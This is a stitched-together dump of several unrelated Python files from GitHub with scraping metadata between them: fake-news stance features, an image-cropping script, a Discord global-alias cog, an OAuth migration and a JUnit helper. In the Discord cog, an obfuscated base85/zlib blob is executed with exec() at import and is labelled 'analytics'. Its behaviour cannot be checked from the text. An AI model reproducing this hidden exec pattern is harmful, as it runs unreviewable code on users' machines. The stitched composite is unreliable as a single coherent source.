        'svo_o_fst': svo_o_fst,
        'svo_s_sig': svo_s_sig,
        'svo_v_sig': svo_v_sig,
        'svo_o_sig': svo_o_sig,
    }
def get_sentence_vec(s):
    """
    Combine token word vectors into one sentence vector by element-wise
    product, mapping NaNs to 0.
    """
    vecs = [token.vector for token in s]
    # np.prod replaces np.product, which was deprecated and removed in
    # NumPy 2.0; the computation is identical.
    return np.nan_to_num(np.prod(vecs, axis=0))
def get_features_stance(headline_data, body_data, n_sent = 5):
    """
    Compute stance features for one headline against each candidate body.

    *headline_data* is a 7-tuple of precomputed headline artifacts
    (doc, dependency graph, topic dict, SVO dicts, root distance,
    negation-ancestor sets, edges); each *body_data* item is a
    (doc, graph) pair. *n_sent* bounds the body summary length.
    Returns (feature vectors, display graphs of the summaries, the
    headline topic dict).
    """
    features = []
    summary_graphs = []
    for item in body_data:
        headline, headline_graph, headline_subjs, headline_svo, headline_root_dist, headline_neg_ancestors, headline_edges = headline_data
        body, body_graph = item
        # Words worth tracking: headline topics plus its S/V/O lemmas.
        h_important_words = set(headline_subjs["_vocab"]).union(set(headline_svo[0])).union(set(headline_svo[1])).union(set(headline_svo[2]))
        #sometimes the coref deletes bodies that are one sentence
        if len(body) == 0:
            # NOTE(review): `get_body` and `b` are not defined in this
            # module -- this fallback would raise NameError if ever taken;
            # confirm against the original coref pipeline.
            body = nlp(preprocess(get_body(b)))
            body_graph = build_graph(body)
        #return the shortest path to negating word for each subject in headline_subjs, if one exists
        neg_h = get_shortest_path_to_negating(headline_graph, h_important_words)
        neg_b = get_shortest_path_to_negating(body_graph, h_important_words)
        #body summary
        summary = get_summary(body, h_important_words, n_sent)
        first_summ_sentence = summary[0]
        summary_edges = [get_edges(s) for s in summary]
        summary_graph = get_display_graph(headline, summary)
        summary_svos = [get_svos(s) for s in summary]
        summary_root_dist = [root_distance(body_graph, list(s[1].keys())[0]) for s in summary_svos]
        summary_neg_ancestors = [get_neg_ancestors(s) for s in summary]
        summary_neg_counts = [s[3:] for s in summary_neg_ancestors]
        # Union the per-sentence negating/doubting/hedging context sets.
        summary_neg_ancestors_superset = [set(), set(), set()]
        for a in summary_neg_ancestors:
            summary_neg_ancestors_superset[0] = summary_neg_ancestors_superset[0].union(a[0])
            summary_neg_ancestors_superset[1] = summary_neg_ancestors_superset[1].union(a[1])
            summary_neg_ancestors_superset[2] = summary_neg_ancestors_superset[2].union(a[2])
        #ancestors
        # +/-1 indicator vectors over the important words; compared by cosine.
        h_anc = [[1 if w in headline_neg_ancestors[0] else -1 for w in h_important_words],
                 [1 if w in headline_neg_ancestors[1] else -1 for w in h_important_words],
                 [1 if w in headline_neg_ancestors[2] else -1 for w in h_important_words]]
        b_anc = [[1 if w in summary_neg_ancestors_superset[0] else -1 for w in h_important_words],
                 [1 if w in summary_neg_ancestors_superset[1] else -1 for w in h_important_words],
                 [1 if w in summary_neg_ancestors_superset[2] else -1 for w in h_important_words]]
        neg_anc_sim = cosine_similarity(h_anc[0], b_anc[0])
        doubt_anc_sim = cosine_similarity(h_anc[1], b_anc[1])
        hedge_anc_sim = cosine_similarity(h_anc[2], b_anc[2])
        neg_anc_overlap = len(headline_neg_ancestors[0].union(summary_neg_ancestors_superset[0]))
        doubt_anc_overlap = len(headline_neg_ancestors[1].union(summary_neg_ancestors_superset[1]))
        hedge_anc_overlap = len(headline_neg_ancestors[2].union(summary_neg_ancestors_superset[2]))
        #svo
        body_s, body_v, body_o = {}, {}, {}
        headline_s, headline_v, headline_o = headline_svo
        for svo in summary_svos:
            body_s.update(svo[0])
            body_v.update(svo[1])
            body_o.update(svo[2])
        # Sum word vectors per role; 384-dim zero vector when a role is empty.
        body_s_vec = list(np.sum([body_s[s].vector for s in body_s], axis = 0)) if len(body_s) > 0 else np.zeros(384)
        body_v_vec = list(np.sum([body_v[s].vector for s in body_v], axis = 0)) if len(body_v) > 0 else np.zeros(384)
        body_o_vec = list(np.sum([body_o[s].vector for s in body_o], axis = 0)) if len(body_o) > 0 else np.zeros(384)
        headline_s_vec = list(np.sum([headline_s[s].vector for s in headline_s], axis = 0)) if len(headline_s) > 0 else np.zeros(384)
        headline_v_vec = list(np.sum([headline_v[s].vector for s in headline_v], axis = 0)) if len(headline_v) > 0 else np.zeros(384)
        headline_o_vec = list(np.sum([headline_o[s].vector for s in headline_o], axis = 0)) if len(headline_o) > 0 else np.zeros(384)
        cos_sim_s = cosine_similarity(body_s_vec, headline_s_vec)
        cos_sim_v = cosine_similarity(body_v_vec, headline_v_vec)
        cos_sim_o = cosine_similarity(body_o_vec, headline_o_vec)
        #negating paths
        # +/-1 indicators of whether a path to a neg/doubt/hedge word exists.
        headline_paths = [neg_b[x] for x in neg_b]
        headline_neg_paths = [1 if x[0] != None else -1 for x in headline_paths]
        headline_doubt_paths = [1 if x[1] != None else -1 for x in headline_paths]
        headline_hedge_paths = [1 if x[2] != None else -1 for x in headline_paths]
        body_paths = [neg_h[x] for x in neg_h]
        body_neg_paths = [1 if x[0] != None else -1 for x in body_paths]
        body_doubt_paths = [1 if x[1] != None else -1 for x in body_paths]
        body_hedge_paths = [1 if x[2] != None else -1 for x in body_paths]
        neg_path_cos_sim = cosine_similarity(headline_neg_paths, body_neg_paths)
        hedge_path_cos_sim = cosine_similarity(headline_hedge_paths, body_hedge_paths)
        doubt_path_cos_sim = cosine_similarity(headline_doubt_paths, body_doubt_paths)
        #root distance
        # 15 stands in for "no path"; distances are normalised by 15 below.
        summary_root_dists = [x if x != None else 15 for x in summary_root_dist]
        avg_summary_root_dist = sum(summary_root_dists)/len(summary_root_dists)
        root_dist_feats = [headline_root_dist, avg_summary_root_dist]
        root_dist_feats = [x/15 if x != None else 1 for x in root_dist_feats]
        root_dist_feats = root_dist_feats + [int(headline_root_dist == None), len([x for x in summary_root_dist if x != None])]
        #sentiment
        headline_sent = get_sentiment(headline.text)
        body_sents = [get_sentiment(s.text) for s in summary]
        avg_body_sent = list(np.mean(body_sents, axis = 0))
        diff_avg_sents = list(np.array(headline_sent) - avg_body_sent)
        diff_sents = list(np.sum([get_diff_sentiment(headline_sent, s) for s in body_sents], axis = 0))
        sent_cos_sim = cosine_similarity(headline_sent, avg_body_sent)
        headline_sentics = get_sentics(headline.text)
        body_sentics = [get_sentics(s.text) for s in summary]
        avg_body_sentics = list(np.mean(body_sentics, axis = 0))
        diff_avg_sentics = list(np.array(headline_sentics) - avg_body_sentics)
        diff_sentics = list(np.sum([get_diff_sentiment(headline_sentics, s) for s in body_sentics], axis = 0))
        sentics_cos_sim = cosine_similarity(headline_sentics, avg_body_sentics)
        #bow
        # +/-1 bag-of-words similarity between headline and first summary sentence.
        headline_vocab = set([tok.lemma_.lower() for tok in headline])
        fst_summ_vocab = set([tok.lemma_.lower() for tok in first_summ_sentence])
        total_vocab = list(headline_vocab.union(fst_summ_vocab))
        headline_embedding = [1 if tok in headline_vocab else -1 for tok in total_vocab]
        fst_summ_embedding = [1 if tok in fst_summ_vocab else -1 for tok in total_vocab]
        bow_cos_sim = cosine_similarity(headline_embedding, fst_summ_embedding)
        #word vecs
        cos_sims = [cosine_similarity(get_sentence_vec(s), headline.vector) for s in summary]
        fst_cos_sim = cos_sims[0]
        avg_cos_sim = sum(cos_sims)/len(cos_sims)
        #neg_hedge_doubt distributions
        hd_dist = list(headline_neg_ancestors[3:])
        body_dist = list(np.sum(summary_neg_counts, axis = 0))
        dist_sim = cosine_similarity(hd_dist, body_dist)
        #build final features list
        fts = (
            [fst_cos_sim, avg_cos_sim, bow_cos_sim,
             neg_path_cos_sim, hedge_path_cos_sim, doubt_path_cos_sim,
             neg_anc_sim, hedge_anc_sim, doubt_anc_sim,
             neg_anc_overlap, hedge_anc_overlap, doubt_anc_overlap,
             cos_sim_s, cos_sim_v, cos_sim_o,
             dist_sim, sent_cos_sim, sentics_cos_sim] +
            diff_avg_sents + diff_sents + diff_avg_sentics + diff_sentics +
            root_dist_feats + hd_dist + body_dist +
            headline_sent + avg_body_sent + headline_sentics + avg_body_sentics
        )
        features.append(fts)
        summary_graphs.append(summary_graph)
    return features, summary_graphs, headline_subjs
| CornellDataScience/Insights-FakeNews | flask_app/server_helpers.py | server_helpers.py | py | 28,281 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "spacy.load",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer",
"line_number": 47,
"usage_type": "call"
},... |
29373059823 | import tensorflow_datasets as tfds
import numpy as np
def dataset_crop(setName, setType):
    """
    Crop every image of a tfds split into non-overlapping 100x100 patches
    and save them to "<setName>_<setType>.npz" under the key ``dataset``.

    The saved array has shape (n_patches, 100, 100, 3); its float64 dtype
    (from the zero dummy row) is preserved for compatibility with the
    previous implementation. Note that when loading the images into a
    script, the arraytype has to be 'int' for imshow to render properly.
    """
    # Get tf dataset
    (trainingdata), metadata = tfds.load(setName, split=setType, with_info=True,
                                         as_supervised=True)
    # Iterate through it once for counting dataset size
    total_number_img = sum(1 for _ in iter(trainingdata))
    # Collect patches in a list and stack once at the end: calling
    # np.vstack inside the loop copies the whole accumulated array each
    # time, which is quadratic in the number of patches.
    patches = [np.zeros((1, 100, 100, 3))]  # float dummy keeps the output dtype float64
    for index, item in enumerate(iter(trainingdata)):
        image = np.expand_dims(item[0].numpy().astype('int'), 0)
        # Count how many full 100-pixel tiles fit on the y and x axes.
        img_y_count = image.shape[1] // 100
        img_x_count = image.shape[2] // 100
        # Cut the image into tiles.
        for y in (np.arange(img_y_count) + 1):
            for x in (np.arange(img_x_count) + 1):
                patches.append(image[:, y*100-100:y*100, x*100-100:x*100, :])
        # Print progress every 20 images.
        if (index + 1) % 20 == 0:
            print("Picture number {} out of {} done".format((index + 1), total_number_img))
    # Stack once and drop the dummy row -- same output as before at linear cost.
    dataset = np.vstack(patches)[1:, ...]
    np.savez("{}.npz".format(setName + "_" + setType), dataset=dataset)
# Build the cropped-tile archives for each split of Oxford Flowers 102.
dataset_crop('oxford_flowers102', "train")
dataset_crop('oxford_flowers102', "test")
dataset_crop('oxford_flowers102', "validation")
# Note that when loading the images into a script, the arraytype has to be 'int'
# for the images to render properly with imshow | Mathiasdfn/SuperscaleGAN | dataset_crop - Copy.py | dataset_crop - Copy.py | py | 1,863 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow_datasets.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
... |
73321987875 | from discord.ext import commands
from .utils.chat_formatting import box, pagify, warning
from .utils.dataIO import dataIO
from .utils import checks
import asyncio
import os
from copy import copy
__version__ = '1.3.0'
PATH = 'data/galias/'
JSON = PATH + 'aliases.json'
# Analytics core
import zlib, base64
exec(zlib.decompress(base64.b85decode("""c-oB^YjfMU@w<No&NCTMHA`DgE_b6jrg7c0=eC!Z-Rs==JUobmEW{+iBS0ydO#XX!7Y|XglIx5;0)gG
dz8_Fcr+dqU*|eq7N6LRHy|lIqpIt5NLibJhHX9R`+8ix<-LO*EwJfdDtzrJClD`i!oZg#ku&Op$C9Jr56Jh9UA1IubOIben3o2zw-B+3XXydVN8qroBU@6S
9R`YOZmSXA-=EBJ5&%*xv`7_y;x{^m_EsSCR`1zt0^~S2w%#K)5tYmLMilWG;+0$o7?E2>7=DPUL`+w&gRbpnRr^X6vvQpG?{vlKPv{P&Kkaf$BAF;n)T)*0
d?qxNC1(3HFH$UbaB|imz3wMSG|Ga+lI>*x!E&@;42cug!dpFIK;~!;R>u=a4Vz8y`WyWrn3e;uThrxi^*zbcXAK*w-hS{aC?24}>1BQDmD|XC|?}Y_K)!wt
gh<nLYi-r|wI0h@$Y@8i_ZI35#>p9%|-=%DsY{k5mRmwJc=-FIbwpMk`jBG0=THS6MJs2`46LUSl@lusbqJ`H27BW(6QAtFo*ix?<SZ~Ahf=NN3WKFz)^+TI
7QEOmxt?UvhIC^ic3Ax+YB{1x5g($q2h}D8*$U8fJt>?PhusN{ONOTS+%2I;Ctp?3VVl^dVS8NR`CXWFk$^t%7_yrg#Maz27ChBD|fWTd^R-)XnPS*;4&<Hb
R?}uRSd*FANXCTd~x2*g5GpgcrUhDa3BaD^(>D%{LKVMw_k~P%}$MPFA4VX|Gile`<zx~91c=^rr+w<vk`rY|=&(6-De}DG${Okn-OUXv48f1GJor`5?v$q%
TFMcY}5A#o4RYqCKXHQd5P|0W0l#5QSaPj#FB6I;BuUch`A~CXFq+r-o=E-CNvA}RAD~d)}LoFd7IC;j_XS3*~oCR<oki&oY1UVbk3M=!!i`vMr-HBc_rohO
|KYb3nAo(D3N*jqx8}YH0ZT{`_d=dceSKGK)%DT(>D{@Oz2jmA@MhJ3e$0)fWT9uy=op<MfB6@-2KrMVS%9JTqqE=Obp+{=TFfvIcBP<V%F1-&Kr5ENQ4{8B
O-DM?sla&RYID~?N6EuFrUQ$MCB=~majN{JA+Mr>G0gxnz?*zZ$6X}YoDquT-f86S&9r_jl4^iwTB=b@dO<h-rGjr0zPBuz^FWl*PixdEmk567et~{sX$e;&
8hw@7@FLKBvxWZxR2upCDK-SAfuOtZ>?<UEL0#>bPz&m#k_EfT?6V$@c-S?1*oX@v%4J?ovJe=Ffg02v15~5{j(c*4z_SnsD`azD(52?Q`Wu16@BUW;Y3%YD
I)=&rtyM)rFj5W?JunahlgVRPl$V&C&BRKI6h$QzMFpXXsu7x!1gjEZWC@qCeduj65x|OLYty_TCL;TTlFtT?m((VE-w=RSO<GXUtMq1v9bTWD-x(+!=c5cU
u-JNvZ=%&fYkDWqE_d{1<>|oX?Tn2G64O>Hu6N^_?$cB)TyG=4V0GT<$$tOOjiqGg6Yg#f)QeNzC#b`#BGgYO?-{f{SeSVknN;R^@h&cZm3J@IxpK->s4_dW
J!rxLkJAGpKlhA5quEd29O8_b1C-D?IFe@9_jXS-pCCHLYPWXhUK6UR0$qA=R{Amo|$>cNWg?d1zX>eSKpBCK4Iu+}6D|=G2?KfoXCKqd=Y|Q!@`dHCGg@v{
vA$Z5dyJ<+eC&xFNPBQ-HUmQKiSM7yrrK|E5dKoHVjMCI*{|5XjK-hRoxfE?H>%7VQDis50t<T-{7R&*yNdElnjEIVy$Wqa#6}UueK}JZ;YuP80jPk8PX22@
?fs-R5ufnCP7+1I4tB2o(kPl4r*iS;&0X@%LZri7fyY#1ABHnz3YKWpp7TXabSjn;momJS$fEU9}3epF*a@*n;E(&?p(Kx;VjZ}=<Gteb=fmkF39Gebr&Y)j
}CI`&V#JvE5;9cOe$I&DwIcK3S0(WM=-FA1Qs{9-Bgtmar60ON}N1Y`!qS)%8K^$j)>^pSbB$ixCoa0<BU@bqEva{?J{lGorEQHBx$ERH_jk!1Y@gW}@T9`r
#?E758i1{u?F)W;7hkYl#mw*o-1$NfSNJ5MHHkpg0UF!__4)rMXp^P_R1{w2&j)S)*(Rn7Icog3e|1$4m*>^&IpbJI}dPqMdW~P?1OQsGAGQsgxjAs2HHrr@
Uu_tG{KEibSt2hp*w>;;6`u^-us%TPoaOVJ_?FPO$^>8k0HZC^DBEVf_F7FnB+e@mz5Ph%uUiTzW2WfG~IS@6vhTA70{2-iN)(RAJ4IWC#7^Vpt7a5K@&~#!
IKTr@4s_iWEiu2X~OGbpi#AE1zlWirPcza;tQmxNBas>$asN8nCtL4HbJNJw=Mg2f&Qo;;0AJ=Pl%yz>lwi3o^V?@NcsN<x-K=3~6Aa*tDu}Nq`h=X?O$+(}
G#iwVecFa^RZnvc3UWk3%z+7%&BvtLF^Ru(`{Onm6ct(to99#bX&-NrI4A-LMkD7_tX2?~6ZC!o~1n-D?0wl>Ckrc%k^6QM?QSgxi)qIOAz~S9voLkS~9jUd
2QRvhMhN7IVupD@Dc%||!)wb6GWa<j|4A7w^>1*G#geQy>+K)ZWl+Q>%nQt4gWkAZP9DIR5AB$NBZn~vz>MkF(Q^sY!XeEmiihsn({31b~az08JoJJ#h3c}f
p5@@p1uZ)0wyV4eVv6#)ZuBnR+O{?2~#O=WX>|hTRpjFOeVaH+?)1<@5zZB3O7atkQq3>a@-XQ)u=e|AQBOb{yxSwh(gxjx~Vv~$|jVJh*@h8bDT~B=5AKTB
gN|&SdeV*g%SW;!~C5(noym~n<pmP|pKUV5q8kb0-nBhD;q$Tq#fK4)JPKcs^U5or(L8H~9`^>)Z?6B?O_nr{EyXCH+`{upZAEX~!wi8Yv=mFA^{NoWvRbQE
KO5Mv*BE!$bYYEr0ovE^y*)}a6NFOjJjE0+|{YfciCAuY+A)JkO+6tU#`RKipPqs58oQ-)JL1o*<C-bic2Y}+c08GsIZUU3Cv*4w^k5I{Db50K0bKPSFshmx
Rj(Y0|;SU2d?s+MPi6(PPLva(Jw(n0~TKDN@5O)F|k^_pcwolv^jBVTLhNqMQ#x6WU9J^I;wLr}Cut#l+JlXfh1Bh<$;^|hNLoXLD#f*Fy-`e~b=ZU8rA0GJ
FU1|1o`VZODxuE?x@^rESdOK`qzRAwqpai|-7cM7idki4HKY>0$z!aloMM7*HJs+?={U5?4IFt""".replace("\n", ""))))
# End analytics core
class GlobalAlias:
    """Owner-only cog providing command aliases shared by all servers.

    Aliases are stored in data/galias/aliases.json as a flat
    {alias: command_string} mapping. Server-local aliases (from the
    regular Alias cog) always take priority over a global alias of the
    same name.
    """
    def __init__(self, bot):
        self.bot = bot
        self.aliases = dataIO.load_json(JSON)
        try:
            # NOTE(review): CogAnalytics is not defined anywhere visible in
            # this file -- presumably injected by the obfuscated
            # "analytics core" exec blob above. Verify before trusting it.
            self.analytics = CogAnalytics(self)
        except Exception as error:
            self.bot.logger.exception(error)
            self.analytics = None
    def save(self):
        # Persist the alias map to data/galias/aliases.json.
        dataIO.save_json(JSON, self.aliases)
    @commands.group(pass_context=True)
    @checks.is_owner()
    async def galias(self, ctx):
        """Manage global aliases for commands"""
        if ctx.invoked_subcommand is None:
            await self.bot.send_cmd_help(ctx)
    @galias.command(name="add", pass_context=True)
    async def _add_alias(self, ctx, command, *, to_execute):
        """
        Add a global alias for a command
        Example: !galias add test flip @Twentysix
        """
        command = command.lower()
        server = ctx.message.server
        if ' ' in command:
            await self.bot.say("Aliases can't contain spaces.")
            return
        # Warn (but do not abort) when servers already define this alias
        # locally; the local alias overrides the global one there.
        existing = self.servers_with_alias(command)
        if existing:
            this_server = server in existing
            incl = ", including this one" if this_server else ""
            await self.bot.say(warning("{} is already a regular alias in "
                                       "{} servers{}. In those servers, the "
                                       "existing alias will take priority."
                                       ).format(command, len(existing), incl))
        # Strip the bot prefix from the aliased command text, if present.
        new_message = copy(ctx.message)
        new_message.content = to_execute
        prefix = await self.get_prefix(new_message)
        if prefix is not None:
            to_execute = to_execute[len(prefix):]
        if command in self.bot.commands:
            await self.bot.say(warning("Cannot add '{}', because it's a real "
                                       "bot command.".format(command)))
        elif command in self.aliases:
            await self.bot.say(warning("The alias '{0}' already exists. "
                                       "Remove it first, or use `{1}galias "
                                       "edit {0} ...`".format(command, prefix)
                                       ))
        else:
            self.aliases[command] = to_execute
            self.save()
            await self.bot.say("Global alias '{}' added.".format(command))
    @galias.command(name="edit", pass_context=True)
    async def _edit_alias(self, ctx, command, *, to_execute):
        """Edits an alias"""
        # Strip the bot prefix from the new command text, if present.
        new_message = copy(ctx.message)
        new_message.content = to_execute
        prefix = await self.get_prefix(new_message)
        if prefix is not None:
            to_execute = to_execute[len(prefix):]
        if command in self.aliases:
            self.aliases[command] = to_execute
            self.save()
            await self.bot.say("Global alias '{}' updated.".format(command))
        else:
            await self.bot.say(warning("That alias doesn't exist."))
    @galias.command(name="rename", pass_context=True)
    async def _rename_alias(self, ctx, old_name, new_name):
        """Renames an alias"""
        server = ctx.message.server
        if ' ' in new_name:
            await self.bot.say("Aliases can't contain spaces.")
            return
        # Same local-override warning as in `galias add`.
        existing = self.servers_with_alias(new_name)
        if existing:
            this_server = server in existing
            incl = ", including this one" if this_server else ""
            await self.bot.say(warning("{} is already a regular alias in "
                                       "{} servers{}. In those servers, the "
                                       "existing alias will take priority."
                                       ).format(new_name, len(existing), incl))
        if new_name in self.bot.commands:
            await self.bot.say(warning("Cannot rename to '{}', because it's a"
                                       " real bot command.".format(new_name)))
        elif new_name in self.aliases:
            await self.bot.say(warning("The alias '{}' already exists.".format(new_name)))
        elif old_name in self.aliases:
            self.aliases[new_name] = self.aliases.pop(old_name)
            self.save()
            await self.bot.say("Global alias '{}' renamed to '{}'."
                               .format(old_name, new_name))
        else:
            await self.bot.say(warning("Alias '{}' doesn't exist.".format(old_name)))
    @galias.command(name="help", pass_context=True)
    async def _help_alias(self, ctx, command):
        """Tries to execute help for the base command of the alias"""
        if command in self.aliases:
            # First word of the aliased text is the underlying command name.
            help_cmd = self.aliases[command].split(" ")[0]
            new_content = ctx.prefix
            new_content += "help "
            new_content += help_cmd[len(ctx.prefix):]
            message = ctx.message
            message.content = new_content
            await self.bot.process_commands(message)
        else:
            await self.bot.say(warning("That alias doesn't exist."))
    @galias.command(name="show")
    async def _show_alias(self, command):
        """Shows what command the alias executes."""
        if command in self.aliases:
            await self.bot.say(box(self.aliases[command]))
        else:
            await self.bot.say(warning("That alias doesn't exist."))
    @galias.command(name="del", pass_context=True, aliases=['remove'])
    async def _del_alias(self, ctx, command):
        """Deletes an alias"""
        command = command.lower()
        if command in self.aliases:
            self.aliases.pop(command, None)
            self.save()
            await self.bot.say("Global alias '{}' deleted.".format(command))
        else:
            await self.bot.say(warning("That alias doesn't exist."))
    @galias.command(name="list", pass_context=True)
    async def _alias_list(self, ctx):
        """Lists global command aliases"""
        header = "Alias list:\n"
        # Leave room for the header plus code-block markup when paginating.
        shorten = len(header) + 8
        alias_list = ""
        if not self.aliases:
            await self.bot.say("There are no global aliases.")
            return
        for alias in sorted(self.aliases):
            alias_list += alias + '\n'
        pages = pagify(alias_list, shorten_by=shorten)
        for i, page in enumerate(pages):
            if i == 0:
                page = header + box(page)
            else:
                page = box(page)
            await self.bot.say(page)
    @galias.command(name="overrides")
    async def _show_overrides(self, alias):
        """Shows which servers have a regular alias set."""
        if not self.bot.get_cog('Alias'):
            await self.bot.say(warning("The alias cog must be loaded to "
                                       "check for local overrides."))
            return
        servers = self.servers_with_alias(alias)
        if not servers:
            await self.bot.say("No servers have '{}' as a local alias.".format(alias))
            return
        servers = sorted(servers, key=lambda s: s.name)
        servers_str = ' Server ID | Server Name\n'
        servers_str += '\n'.join('{0.id:>20} | {0.name}'.format(s) for s in servers)
        for page in pagify(servers_str):
            await self.bot.say(box(page))
    async def on_message(self, message):
        # Intercept every message: if it starts with a known global alias,
        # rewrite it to the aliased command and re-dispatch it.
        if not self.bot.user_allowed(message):
            return
        server = message.server
        prefix = await self.get_prefix(message)
        msg = message.content
        if prefix:
            alias = self.first_word(msg[len(prefix):]).lower()
            if alias not in self.aliases:
                return
            elif alias in self.bot.commands:
                return
            # Local (per-server) aliases take priority over global ones.
            if server and alias in self.get_existing_aliases(server):
                return
            new_command = self.aliases[alias]
            args = message.content[len(prefix + alias):]
            new_message = copy(message)
            new_message.content = prefix + new_command + args
            await self.bot.process_commands(new_message)
    async def on_command(self, command, ctx):
        # Feed usage of this cog's own commands to the analytics hook.
        if ctx.cog is self and self.analytics:
            self.analytics.command(ctx)
    def part_of_existing_command(self, alias):
        '''Command or alias'''
        for command in self.bot.commands:
            if alias.lower() == command.lower():
                return True
        return False
    def get_existing_aliases(self, server):
        # Local alias map of the given server, or {} when the Alias cog is
        # absent or has no entry for that server.
        if server is None:
            return {}
        try:
            alias_cog = self.bot.get_cog('Alias')
            return alias_cog.aliases[server.id]
        except Exception:
            return {}
    def servers_with_alias(self, alias):
        # Set of Server objects whose local Alias cog defines `alias`.
        servers = set()
        try:
            alias_cog = self.bot.get_cog('Alias')
            aliases = alias_cog.aliases
            for sid, alias_map in aliases.items():
                server = self.bot.get_server(sid)
                if server and alias in alias_map:
                    servers.add(server)
        except Exception:
            pass
        finally:
            return servers
    def first_word(self, msg):
        # First whitespace-delimited word of `msg`.
        return msg.split(" ")[0]
    async def get_prefix(self, msg):
        """Return the bot prefix that `msg` starts with, or None."""
        prefixes = self.bot.command_prefix
        if callable(prefixes):
            prefixes = prefixes(self.bot, msg)
        if asyncio.iscoroutine(prefixes):
            prefixes = await prefixes
        for p in prefixes:
            if msg.content.startswith(p):
                return p
        return None
def check_folder():
    """Ensure the data/galias directory exists, creating it if needed."""
    if os.path.exists(PATH):
        return
    print("Creating data/galias folder...")
    os.makedirs(PATH)
def check_file():
    """Create an empty aliases.json when the file is missing or invalid."""
    if dataIO.is_valid_json(JSON):
        return
    print("Creating aliases.json...")
    dataIO.save_json(JSON, {})
def setup(bot):
    # Standard Red-bot cog entry point: ensure data files exist, then
    # register the cog with the bot.
    check_folder()
    check_file()
    bot.add_cog(GlobalAlias(bot))
| calebj/calebj-cogs | galias/galias.py | galias.py | py | 13,524 | python | en | code | 47 | github-code | 1 | [
{
"api_name": "zlib.decompress",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "base64.b85decode",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "utils.dataIO.dataIO.load_json",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "utils.... |
24154699064 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add authorization models
Revision ID: 011
Revises: 010
Create Date: 2014-03-21 17:44:51.248232
"""
# revision identifiers, used by Alembic.
revision = '011'
down_revision = '010'
from alembic import op
import sqlalchemy as sa
MYSQL_ENGINE = 'InnoDB'
MYSQL_CHARSET = 'utf8'
def upgrade(active_plugins=None, options=None):
    """Create the OAuth tables: authorizationcodes and bearertokens."""
    op.create_table(
        'authorizationcodes',
        sa.Column('created_at', sa.DateTime(), nullable=True),
        sa.Column('updated_at', sa.DateTime(), nullable=True),
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.Unicode(100), nullable=False),
        sa.Column('state', sa.Unicode(100), nullable=False),
        sa.Column('user_id', sa.Integer(), nullable=False),
        # default=True covers ORM inserts; server_default="1" covers rows
        # inserted outside the ORM.
        sa.Column('is_active', sa.Boolean(), default=True, server_default="1",
                  nullable=False),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
        sa.PrimaryKeyConstraint('id'),
        mysql_engine=MYSQL_ENGINE,
        mysql_charset=MYSQL_CHARSET
    )
    op.create_table(
        'bearertokens',
        sa.Column('created_at', sa.DateTime(), nullable=True),
        sa.Column('updated_at', sa.DateTime(), nullable=True),
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('user_id', sa.Integer(), nullable=False),
        sa.Column('access_token', sa.Unicode(100), nullable=False),
        sa.Column('refresh_token', sa.Unicode(100), nullable=False),
        sa.Column('expires_in', sa.Integer(), nullable=False),
        sa.Column('expires_at', sa.DateTime(), nullable=False),
        sa.Column('is_active', sa.Boolean(), default=True, server_default="1",
                  nullable=False),
        sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
        sa.PrimaryKeyConstraint('id'),
        mysql_engine=MYSQL_ENGINE,
        mysql_charset=MYSQL_CHARSET
    )
def downgrade(active_plugins=None, options=None):
    """Drop the two tables created by upgrade()."""
    op.drop_table('bearertokens')
    op.drop_table('authorizationcodes')
| pombredanne/storyboard | storyboard/db/migration/alembic_migrations/versions/011_authorization_models.py | 011_authorization_models.py | py | 2,556 | python | en | code | null | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.DateT... |
73184180514 | """
Helpers for processing JUnit evaluations.
"""
import os
import stat
import patoolib
import glob
import subprocess32 as subprocess
from application import app
from application.models import TestResult, TestCase
from flask import render_template
from shutil import move
import xml.etree.ElementTree as ET
from shutil import rmtree
from tempfile import mkdtemp
class Enumerator(object):
    """Hands out unique lowercase tokens ('a', 'b', ..., 'z', 'aa', ...),
    never returning a word supplied in the banned list nor a token that
    was already issued."""
    def __init__(self, banned_words_list):
        self.token = ['a']
        # Banned words and already-issued tokens share one lookup set.
        self.symbol_table = set(banned_words_list)
    def get_token(self):
        """Return the next free token and reserve it."""
        candidate = "".join(self.token)
        while candidate in self.symbol_table:
            self.increment_token()
            candidate = "".join(self.token)
        self.symbol_table.add(candidate)
        self.increment_token()
        return candidate
    def increment_token(self):
        """Advance self.token to its successor in enumeration order."""
        last = self.token[-1]
        if last != 'z':
            self.token[-1] = chr(ord(last) + 1)
        elif len(self.token) == 1:
            self.token = ['a', 'a']
        elif all(c == 'z' for c in self.token):
            # Every position saturated: grow the token by one place.
            self.token.append('a')
        else:
            self.increment_helper()
    def increment_helper(self):
        # Carry: drop trailing 'z's, bump the first non-'z' character,
        # then pad with a single 'a' (iterative form of the old recursion).
        while self.token[-1] == 'z':
            self.token = self.token[:-1]
        self.token[-1] = chr(ord(self.token[-1]) + 1)
        self.token.append('a')
class DirectoryError(Exception):
    """Raised when a working-directory sanity check fails (e.g. the entry
    count did not grow after a write or an extraction)."""
    def __init__(self, value):
        # Keep .value for existing callers, but also pass the message to
        # Exception so str(exc) and logging show something useful
        # (the original called super().__init__() with no arguments).
        self.value = value
